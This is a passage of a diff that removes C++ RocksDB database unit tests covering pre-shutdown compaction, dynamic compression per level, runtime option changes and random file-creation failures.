-TEST_P(DBTestWithParam, PreShutdownManualCompaction) {
-  Options options = CurrentOptions();
-  options.max_subcompactions = max_subcompactions_;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // iter - 0 with 7 levels
-  // iter - 1 with 3 levels
-  for (int iter = 0; iter < 2; ++iter) {
-    MakeTables(3, "p", "q", 1);
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls before files
-    Compact(1, "", "c");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range falls after files
-    Compact(1, "r", "z");
-    ASSERT_EQ("1,1,1", FilesPerLevel(1));
-
-    // Compaction range overlaps files
-    Compact(1, "p1", "p9");
-    ASSERT_EQ("0,0,1", FilesPerLevel(1));
-
-    // Populate a different range
-    MakeTables(3, "c", "e", 1);
-    ASSERT_EQ("1,1,2", FilesPerLevel(1));
-
-    // Compact just the new range
-    Compact(1, "b", "f");
-    ASSERT_EQ("0,0,2", FilesPerLevel(1));
-
-    // Compact all
-    MakeTables(1, "a", "z", 1);
-    ASSERT_EQ("1,0,2", FilesPerLevel(1));
-    CancelAllBackgroundWork(db_);
-    db_->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-    ASSERT_EQ("1,0,2", FilesPerLevel(1));
-
-    if (iter == 0) {
-      options = CurrentOptions();
-      options.num_levels = 3;
-      options.create_if_missing = true;
-      DestroyAndReopen(options);
-      CreateAndReopenWithCF({"pikachu"}, options);
-    }
-  }
-}
-
-TEST_F(DBTest, PreShutdownFlush) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ASSERT_OK(Put(1, "key", "value"));
-  CancelAllBackgroundWork(db_);
-  Status s =
-      db_->CompactRange(CompactRangeOptions(), handles_[1], nullptr, nullptr);
-  ASSERT_TRUE(s.IsShutdownInProgress());
-}
-
-TEST_P(DBTestWithParam, PreShutdownMultipleCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 40;
-  const int kNumL0Files = 4;
-
-  const int kHighPriCount = 3;
-  const int kLowPriCount = 5;
-  env_->SetBackgroundThreads(kHighPriCount, Env::HIGH);
-  env_->SetBackgroundThreads(kLowPriCount, Env::LOW);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base =
-      options.target_file_size_base * kNumL0Files;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.max_bytes_for_level_multiplier = 2;
-  options.max_background_compactions = kLowPriCount;
-  options.level0_stop_writes_trigger = 1 << 10;
-  options.level0_slowdown_writes_trigger = 1 << 10;
-  options.max_subcompactions = max_subcompactions_;
-
-  TryReopen(options);
-  Random rnd(301);
-
-  std::vector<ThreadStatus> thread_list;
-  // Delay both flush and compaction
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"FlushJob::FlushJob()", "CompactionJob::Run():Start"},
-       {"CompactionJob::Run():Start",
-        "DBTest::PreShutdownMultipleCompaction:Preshutdown"},
-       {"CompactionJob::Run():Start",
-        "DBTest::PreShutdownMultipleCompaction:VerifyCompaction"},
-       {"DBTest::PreShutdownMultipleCompaction:Preshutdown",
-        "CompactionJob::Run():End"},
-       {"CompactionJob::Run():End",
-        "DBTest::PreShutdownMultipleCompaction:VerifyPreshutdown"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Make rocksdb busy
-  int key = 0;
-  // check how many threads are doing compaction using GetThreadList
-  int operation_count[ThreadStatus::NUM_OP_TYPES] = {0};
-  for (int file = 0; file < 16 * kNumL0Files; ++file) {
-    for (int k = 0; k < kEntriesPerBuffer; ++k) {
-      ASSERT_OK(Put(ToString(key++), RandomString(&rnd, kTestValueSize)));
-    }
-
-    Status s = env_->GetThreadList(&thread_list);
-    for (auto thread : thread_list) {
-      operation_count[thread.operation_type]++;
-    }
-
-    // Speed up the test
-    if (operation_count[ThreadStatus::OP_FLUSH] > 1 &&
-        operation_count[ThreadStatus::OP_COMPACTION] >
-            0.6 * options.max_background_compactions) {
-      break;
-    }
-    if (file == 15 * kNumL0Files) {
-      TEST_SYNC_POINT("DBTest::PreShutdownMultipleCompaction:Preshutdown");
-    }
-  }
-
-  TEST_SYNC_POINT("DBTest::PreShutdownMultipleCompaction:Preshutdown");
-  ASSERT_GE(operation_count[ThreadStatus::OP_COMPACTION], 1);
-  CancelAllBackgroundWork(db_);
-  TEST_SYNC_POINT("DBTest::PreShutdownMultipleCompaction:VerifyPreshutdown");
-  dbfull()->TEST_WaitForCompact();
-  // Record the number of compactions at a time.
-  for (int i = 0; i < ThreadStatus::NUM_OP_TYPES; ++i) {
-    operation_count[i] = 0;
-  }
-  Status s = env_->GetThreadList(&thread_list);
-  for (auto thread : thread_list) {
-    operation_count[thread.operation_type]++;
-  }
-  ASSERT_EQ(operation_count[ThreadStatus::OP_COMPACTION], 0);
-}
-
-TEST_P(DBTestWithParam, PreShutdownCompactionMiddle) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 40;
-  const int kNumL0Files = 4;
-
-  const int kHighPriCount = 3;
-  const int kLowPriCount = 5;
-  env_->SetBackgroundThreads(kHighPriCount, Env::HIGH);
-  env_->SetBackgroundThreads(kLowPriCount, Env::LOW);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  options.compaction_style = kCompactionStyleLevel;
-  options.target_file_size_base = options.write_buffer_size;
-  options.max_bytes_for_level_base =
-      options.target_file_size_base * kNumL0Files;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.env = env_;
-  options.enable_thread_tracking = true;
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.max_bytes_for_level_multiplier = 2;
-  options.max_background_compactions = kLowPriCount;
-  options.level0_stop_writes_trigger = 1 << 10;
-  options.level0_slowdown_writes_trigger = 1 << 10;
-  options.max_subcompactions = max_subcompactions_;
-
-  TryReopen(options);
-  Random rnd(301);
-
-  std::vector<ThreadStatus> thread_list;
-  // Delay both flush and compaction
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBTest::PreShutdownCompactionMiddle:Preshutdown",
-        "CompactionJob::Run():Inprogress"},
-       {"CompactionJob::Run():Start",
-        "DBTest::PreShutdownCompactionMiddle:VerifyCompaction"},
-       {"CompactionJob::Run():Inprogress", "CompactionJob::Run():End"},
-       {"CompactionJob::Run():End",
-        "DBTest::PreShutdownCompactionMiddle:VerifyPreshutdown"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Make rocksdb busy
-  int key = 0;
-  // check how many threads are doing compaction using GetThreadList
-  int operation_count[ThreadStatus::NUM_OP_TYPES] = {0};
-  for (int file = 0; file < 16 * kNumL0Files; ++file) {
-    for (int k = 0; k < kEntriesPerBuffer; ++k) {
-      ASSERT_OK(Put(ToString(key++), RandomString(&rnd, kTestValueSize)));
-    }
-
-    Status s = env_->GetThreadList(&thread_list);
-    for (auto thread : thread_list) {
-      operation_count[thread.operation_type]++;
-    }
-
-    // Speed up the test
-    if (operation_count[ThreadStatus::OP_FLUSH] > 1 &&
-        operation_count[ThreadStatus::OP_COMPACTION] >
-            0.6 * options.max_background_compactions) {
-      break;
-    }
-    if (file == 15 * kNumL0Files) {
-      TEST_SYNC_POINT("DBTest::PreShutdownCompactionMiddle:VerifyCompaction");
-    }
-  }
-
-  ASSERT_GE(operation_count[ThreadStatus::OP_COMPACTION], 1);
-  CancelAllBackgroundWork(db_);
-  TEST_SYNC_POINT("DBTest::PreShutdownCompactionMiddle:Preshutdown");
-  TEST_SYNC_POINT("DBTest::PreShutdownCompactionMiddle:VerifyPreshutdown");
-  dbfull()->TEST_WaitForCompact();
-  // Record the number of compactions at a time.
-  for (int i = 0; i < ThreadStatus::NUM_OP_TYPES; ++i) {
-    operation_count[i] = 0;
-  }
-  Status s = env_->GetThreadList(&thread_list);
-  for (auto thread : thread_list) {
-    operation_count[thread.operation_type]++;
-  }
-  ASSERT_EQ(operation_count[ThreadStatus::OP_COMPACTION], 0);
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, FlushOnDestroy) {
-  WriteOptions wo;
-  wo.disableWAL = true;
-  ASSERT_OK(Put("foo", "v1", wo));
-  CancelAllBackgroundWork(db_);
-}
-
-TEST_F(DBTest, DynamicLevelCompressionPerLevel) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  const int kNKeys = 120;
-  int keys[kNKeys];
-  for (int i = 0; i < kNKeys; i++) {
-    keys[i] = i;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  Random rnd(301);
-  Options options;
-  options.create_if_missing = true;
-  options.db_write_buffer_size = 20480;
-  options.write_buffer_size = 20480;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 2;
-  options.target_file_size_base = 20480;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 102400;
-  options.max_bytes_for_level_multiplier = 4;
-  options.max_background_compactions = 1;
-  options.num_levels = 5;
-
-  options.compression_per_level.resize(3);
-  options.compression_per_level[0] = kNoCompression;
-  options.compression_per_level[1] = kNoCompression;
-  options.compression_per_level[2] = kSnappyCompression;
-
-  OnFileDeletionListener* listener = new OnFileDeletionListener();
-  options.listeners.emplace_back(listener);
-
-  DestroyAndReopen(options);
-
-  // Insert more than 80K. L4 should be base level. Neither L0 nor L4 should
-  // be compressed, so total data size should be more than 80K.
-  for (int i = 0; i < 20; i++) {
-    ASSERT_OK(Put(Key(keys[i]), CompressibleString(&rnd, 4000)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(3), 0);
-  // Assuming each files' metadata is at least 50 bytes/
-  ASSERT_GT(SizeAtLevel(0) + SizeAtLevel(4), 20U * 4000U + 50U * 4);
-
-  // Insert 400KB. Some data will be compressed
-  for (int i = 21; i < 120; i++) {
-    ASSERT_OK(Put(Key(keys[i]), CompressibleString(&rnd, 4000)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_LT(SizeAtLevel(0) + SizeAtLevel(3) + SizeAtLevel(4),
-            120U * 4000U + 50U * 24);
-  // Make sure data in files in L3 is not compacted by removing all files
-  // in L4 and calculate number of rows
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  ColumnFamilyMetaData cf_meta;
-  db_->GetColumnFamilyMetaData(&cf_meta);
-  for (auto file : cf_meta.levels[4].files) {
-    listener->SetExpectedFileName(dbname_ + file.name);
-    ASSERT_OK(dbfull()->DeleteFile(file.name));
-  }
-  listener->VerifyMatchedCount(cf_meta.levels[4].files.size());
-
-  int num_keys = 0;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    num_keys++;
-  }
-  ASSERT_OK(iter->status());
-  ASSERT_GT(SizeAtLevel(0) + SizeAtLevel(3), num_keys * 4000U + num_keys * 10U);
-}
-
-TEST_F(DBTest, DynamicLevelCompressionPerLevel2) {
-  if (!Snappy_Supported() || !LZ4_Supported() || !Zlib_Supported()) {
-    return;
-  }
-  const int kNKeys = 500;
-  int keys[kNKeys];
-  for (int i = 0; i < kNKeys; i++) {
-    keys[i] = i;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  Random rnd(301);
-  Options options;
-  options.create_if_missing = true;
-  options.db_write_buffer_size = 6000000;
-  options.write_buffer_size = 600000;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 2;
-  options.soft_pending_compaction_bytes_limit = 1024 * 1024;
-  options.target_file_size_base = 20;
-
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 200;
-  options.max_bytes_for_level_multiplier = 8;
-  options.max_background_compactions = 1;
-  options.num_levels = 5;
-  std::shared_ptr<mock::MockTableFactory> mtf(new mock::MockTableFactory);
-  options.table_factory = mtf;
-
-  options.compression_per_level.resize(3);
-  options.compression_per_level[0] = kNoCompression;
-  options.compression_per_level[1] = kLZ4Compression;
-  options.compression_per_level[2] = kZlibCompression;
-
-  DestroyAndReopen(options);
-  // When base level is L4, L4 is LZ4.
-  std::atomic<int> num_zlib(0);
-  std::atomic<int> num_lz4(0);
-  std::atomic<int> num_no(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "LevelCompactionPicker::PickCompaction:Return", [&](void* arg) {
-        Compaction* compaction = reinterpret_cast<Compaction*>(arg);
-        if (compaction->output_level() == 4) {
-          ASSERT_TRUE(compaction->output_compression() == kLZ4Compression);
-          num_lz4.fetch_add(1);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "FlushJob::WriteLevel0Table:output_compression", [&](void* arg) {
-        auto* compression = reinterpret_cast<CompressionType*>(arg);
-        ASSERT_TRUE(*compression == kNoCompression);
-        num_no.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  for (int i = 0; i < 100; i++) {
-    std::string value = RandomString(&rnd, 200);
-    ASSERT_OK(Put(Key(keys[i]), value));
-    if (i % 25 == 24) {
-      Flush();
-      dbfull()->TEST_WaitForCompact();
-    }
-  }
-
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(3), 0);
-  ASSERT_GT(NumTableFilesAtLevel(4), 0);
-  ASSERT_GT(num_no.load(), 2);
-  ASSERT_GT(num_lz4.load(), 0);
-  int prev_num_files_l4 = NumTableFilesAtLevel(4);
-
-  // After base level turn L4->L3, L3 becomes LZ4 and L4 becomes Zlib
-  num_lz4.store(0);
-  num_no.store(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "LevelCompactionPicker::PickCompaction:Return", [&](void* arg) {
-        Compaction* compaction = reinterpret_cast<Compaction*>(arg);
-        if (compaction->output_level() == 4 && compaction->start_level() == 3) {
-          ASSERT_TRUE(compaction->output_compression() == kZlibCompression);
-          num_zlib.fetch_add(1);
-        } else {
-          ASSERT_TRUE(compaction->output_compression() == kLZ4Compression);
-          num_lz4.fetch_add(1);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "FlushJob::WriteLevel0Table:output_compression", [&](void* arg) {
-        auto* compression = reinterpret_cast<CompressionType*>(arg);
-        ASSERT_TRUE(*compression == kNoCompression);
-        num_no.fetch_add(1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  for (int i = 101; i < 500; i++) {
-    std::string value = RandomString(&rnd, 200);
-    ASSERT_OK(Put(Key(keys[i]), value));
-    if (i % 100 == 99) {
-      Flush();
-      dbfull()->TEST_WaitForCompact();
-    }
-  }
-
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-  ASSERT_GT(NumTableFilesAtLevel(3), 0);
-  ASSERT_GT(NumTableFilesAtLevel(4), prev_num_files_l4);
-  ASSERT_GT(num_no.load(), 2);
-  ASSERT_GT(num_lz4.load(), 0);
-  ASSERT_GT(num_zlib.load(), 0);
-}
-
-TEST_F(DBTest, DynamicCompactionOptions) {
-  // minimum write buffer size is enforced at 64KB
-  const uint64_t k32KB = 1 << 15;
-  const uint64_t k64KB = 1 << 16;
-  const uint64_t k128KB = 1 << 17;
-  const uint64_t k1MB = 1 << 20;
-  const uint64_t k4KB = 1 << 12;
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.compression = kNoCompression;
-  options.soft_pending_compaction_bytes_limit = 1024 * 1024;
-  options.write_buffer_size = k64KB;
-  options.arena_block_size = 4 * k4KB;
-  options.max_write_buffer_number = 2;
-  // Compaction related options
-  options.level0_file_num_compaction_trigger = 3;
-  options.level0_slowdown_writes_trigger = 4;
-  options.level0_stop_writes_trigger = 8;
-  options.target_file_size_base = k64KB;
-  options.max_compaction_bytes = options.target_file_size_base * 10;
-  options.target_file_size_multiplier = 1;
-  options.max_bytes_for_level_base = k128KB;
-  options.max_bytes_for_level_multiplier = 4;
-
-  // Block flush thread and disable compaction thread
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  DestroyAndReopen(options);
-
-  auto gen_l0_kb = [this](int start, int size, int stride) {
-    Random rnd(301);
-    for (int i = 0; i < size; i++) {
-      ASSERT_OK(Put(Key(start + stride * i), RandomString(&rnd, 1024)));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-  };
-
-  // Write 3 files that have the same key range.
-  // Since level0_file_num_compaction_trigger is 3, compaction should be
-  // triggered. The compaction should result in one L1 file
-  gen_l0_kb(0, 64, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 1);
-  gen_l0_kb(0, 64, 1);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 2);
-  gen_l0_kb(0, 64, 1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,1", FilesPerLevel());
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(1U, metadata.size());
-  ASSERT_LE(metadata[0].size, k64KB + k4KB);
-  ASSERT_GE(metadata[0].size, k64KB - k4KB);
-
-  // Test compaction trigger and target_file_size_base
-  // Reduce compaction trigger to 2, and reduce L1 file size to 32KB.
-  // Writing to 64KB L0 files should trigger a compaction. Since these
-  // 2 L0 files have the same key range, compaction merge them and should
-  // result in 2 32KB L1 files.
-  ASSERT_OK(dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"},
-                                  {"target_file_size_base", ToString(k32KB)}}));
-
-  gen_l0_kb(0, 64, 1);
-  ASSERT_EQ("1,1", FilesPerLevel());
-  gen_l0_kb(0, 64, 1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,2", FilesPerLevel());
-  metadata.clear();
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(2U, metadata.size());
-  ASSERT_LE(metadata[0].size, k32KB + k4KB);
-  ASSERT_GE(metadata[0].size, k32KB - k4KB);
-  ASSERT_LE(metadata[1].size, k32KB + k4KB);
-  ASSERT_GE(metadata[1].size, k32KB - k4KB);
-
-  // Test max_bytes_for_level_base
-  // Increase level base size to 256KB and write enough data that will
-  // fill L1 and L2. L1 size should be around 256KB while L2 size should be
-  // around 256KB x 4.
-  ASSERT_OK(
-      dbfull()->SetOptions({{"max_bytes_for_level_base", ToString(k1MB)}}));
-
-  // writing 96 x 64KB => 6 * 1024KB
-  // (L1 + L2) = (1 + 4) * 1024KB
-  for (int i = 0; i < 96; ++i) {
-    gen_l0_kb(i, 64, 96);
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_GT(SizeAtLevel(1), k1MB / 2);
-  ASSERT_LT(SizeAtLevel(1), k1MB + k1MB / 2);
-
-  // Within (0.5, 1.5) of 4MB.
-  ASSERT_GT(SizeAtLevel(2), 2 * k1MB);
-  ASSERT_LT(SizeAtLevel(2), 6 * k1MB);
-
-  // Test max_bytes_for_level_multiplier and
-  // max_bytes_for_level_base. Now, reduce both mulitplier and level base,
-  // After filling enough data that can fit in L1 - L3, we should see L1 size
-  // reduces to 128KB from 256KB which was asserted previously. Same for L2.
-  ASSERT_OK(
-      dbfull()->SetOptions({{"max_bytes_for_level_multiplier", "2"},
-                            {"max_bytes_for_level_base", ToString(k128KB)}}));
-
-  // writing 20 x 64KB = 10 x 128KB
-  // (L1 + L2 + L3) = (1 + 2 + 4) * 128KB
-  for (int i = 0; i < 20; ++i) {
-    gen_l0_kb(i, 64, 32);
-  }
-  dbfull()->TEST_WaitForCompact();
-  uint64_t total_size = SizeAtLevel(1) + SizeAtLevel(2) + SizeAtLevel(3);
-  ASSERT_TRUE(total_size < k128KB * 7 * 1.5);
-
-  // Test level0_stop_writes_trigger.
-  // Clean up memtable and L0. Block compaction threads. If continue to write
-  // and flush memtables. We should see put stop after 8 memtable flushes
-  // since level0_stop_writes_trigger = 8
-  dbfull()->TEST_FlushMemTable(true);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  // Block compaction
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-  int count = 0;
-  Random rnd(301);
-  WriteOptions wo;
-  while (count < 64) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), wo));
-    dbfull()->TEST_FlushMemTable(true);
-    count++;
-    if (dbfull()->TEST_write_controler().IsStopped()) {
-      sleeping_task_low.WakeUp();
-      break;
-    }
-  }
-  // Stop trigger = 8
-  ASSERT_EQ(count, 8);
-  // Unblock
-  sleeping_task_low.WaitUntilDone();
-
-  // Now reduce level0_stop_writes_trigger to 6. Clear up memtables and L0.
-  // Block compaction thread again. Perform the put and memtable flushes
-  // until we see the stop after 6 memtable flushes.
-  ASSERT_OK(dbfull()->SetOptions({{"level0_stop_writes_trigger", "6"}}));
-  dbfull()->TEST_FlushMemTable(true);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  // Block compaction again
-  sleeping_task_low.Reset();
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-  count = 0;
-  while (count < 64) {
-    ASSERT_OK(Put(Key(count), RandomString(&rnd, 1024), wo));
-    dbfull()->TEST_FlushMemTable(true);
-    count++;
-    if (dbfull()->TEST_write_controler().IsStopped()) {
-      sleeping_task_low.WakeUp();
-      break;
-    }
-  }
-  ASSERT_EQ(count, 6);
-  // Unblock
-  sleeping_task_low.WaitUntilDone();
-
-  // Test disable_auto_compactions
-  // Compaction thread is unblocked but auto compaction is disabled. Write
-  // 4 L0 files and compaction should be triggered. If auto compaction is
-  // disabled, then TEST_WaitForCompact will be waiting for nothing. Number of
-  // L0 files do not change after the call.
-  ASSERT_OK(dbfull()->SetOptions({{"disable_auto_compactions", "true"}}));
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  for (int i = 0; i < 4; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-    // Wait for compaction so that put won't stop
-    dbfull()->TEST_FlushMemTable(true);
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumTableFilesAtLevel(0), 4);
-
-  // Enable auto compaction and perform the same test, # of L0 files should be
-  // reduced after compaction.
-  ASSERT_OK(dbfull()->SetOptions({{"disable_auto_compactions", "false"}}));
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  for (int i = 0; i < 4; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-    // Wait for compaction so that put won't stop
-    dbfull()->TEST_FlushMemTable(true);
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_LT(NumTableFilesAtLevel(0), 4);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FileCreationRandomFailure) {
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.target_file_size_base = 200000;
-  options.max_bytes_for_level_base = 1000000;
-  options.max_bytes_for_level_multiplier = 2;
-
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  const int kCDTKeysPerBuffer = 4;
-  const int kTestSize = kCDTKeysPerBuffer * 4096;
-  const int kTotalIteration = 100;
-  // the second half of the test involves in random failure
-  // of file creation.
-  const int kRandomFailureTest = kTotalIteration / 2;
-  std::vector<std::string> values;
-  for (int i = 0; i < kTestSize; ++i) {
-    values.push_back("NOT_FOUND");
-  }
-  for (int j = 0; j < kTotalIteration; ++j) {
-    if (j == kRandomFailureTest) {
-      env_->non_writeable_rate_.store(90);
-    }
-    for (int k = 0; k < kTestSize; ++k) {
-      // here we expect some of the Put fails.
-      std::string value = RandomString(&rnd, 100);
-      Status s = Put(Key(k), Slice(value));
-      if (s.ok()) {
-        // update the latest successful put
-        values[k] = value;
-      }
-      // But everything before we simulate the failure-test should succeed.
-      if (j < kRandomFailureTest) {
-        ASSERT_OK(s);
-      }
-    }
-  }
-
-  // If rocksdb does not do the correct job, internal assert will fail here.
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // verify we have the latest successful update
-  for (int k = 0; k < kTestSize; ++k) {
-    auto v = Get(Key(k));
-    ASSERT_EQ(v, values[k]);
-  }
-
-  // reopen and reverify we have the latest successful update
-  env_->non_writeable_rate_.store(0);
-  Reopen(options);
-  for (int k = 0; k < kTestSize; ++k) {
-    auto v = Get(Key(k));
-    ASSERT_EQ(v, values[k]);
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, DynamicMiscOptions) {
-  // Test max_sequential_skip_in_iterations
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.max_sequential_skip_in_iterations = 16;
-  options.compression = kNoCompression;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  auto assert_reseek_count = [this, &options](int key_start, int num_reseek) {
-    int key0 = key_start;
-    int key1 = key_start + 1;
-    int key2 = key_start + 2;
-    Random rnd(301);
-    ASSERT_OK(Put(Key(key0), RandomString(&rnd, 8)));
-    for (int i = 0; i < 10; ++i) {
-      ASSERT_OK(Put(Key(key1), RandomString(&rnd, 8)));
-    }
-    ASSERT_OK(Put(Key(key2), RandomString(&rnd, 8)));
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    iter->Seek(Key(key1));
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Key(key1)), 0);
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Key(key2)), 0);
-    ASSERT_EQ(num_reseek,
-              TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION));
-  };
-  // No reseek
-  assert_reseek_count(100, 0);
-
-  ASSERT_OK(dbfull()->SetOptions({{"max_sequential_skip_in_iterations", "4"}}));
-  // Clear memtable and make new option effective
-  dbfull()->TEST_FlushMemTable(true);
-  // Trigger reseek
-  assert_reseek_count(200, 1);
-
-  ASSERT_OK(
-      dbfull()->SetOptions({{"max_sequential_skip_in_iterations", "16"}}));
-  // Clear memtable and make new option effective
-  dbfull()->TEST_FlushMemTable(true);
-  // No reseek
-  assert_reseek_count(300, 1);
-
-  MutableCFOptions mutable_cf_options;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  // Test soft_pending_compaction_bytes_limit,
-  // hard_pending_compaction_bytes_limit
-  ASSERT_OK(dbfull()->SetOptions(
-      handles_[1], {{"soft_pending_compaction_bytes_limit", "200"},
-                    {"hard_pending_compaction_bytes_limit", "300"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[1],
-                                                     &mutable_cf_options));
-  ASSERT_EQ(200, mutable_cf_options.soft_pending_compaction_bytes_limit);
-  ASSERT_EQ(300, mutable_cf_options.hard_pending_compaction_bytes_limit);
-  // Test report_bg_io_stats
-  ASSERT_OK(
-      dbfull()->SetOptions(handles_[1], {{"report_bg_io_stats", "true"}}));
-  // sanity check
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[1],
-                                                     &mutable_cf_options));
-  ASSERT_TRUE(mutable_cf_options.report_bg_io_stats);
-  // Test compression
-  // sanity check
-  ASSERT_OK(dbfull()->SetOptions({{"compression", "kNoCompression"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[0],
-                                                     &mutable_cf_options));
-  ASSERT_EQ(CompressionType::kNoCompression, mutable_cf_options.compression);
-  ASSERT_OK(dbfull()->SetOptions({{"compression", "kSnappyCompression"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[0],
-                                                     &mutable_cf_options));
-  ASSERT_EQ(CompressionType::kSnappyCompression,
-            mutable_cf_options.compression);
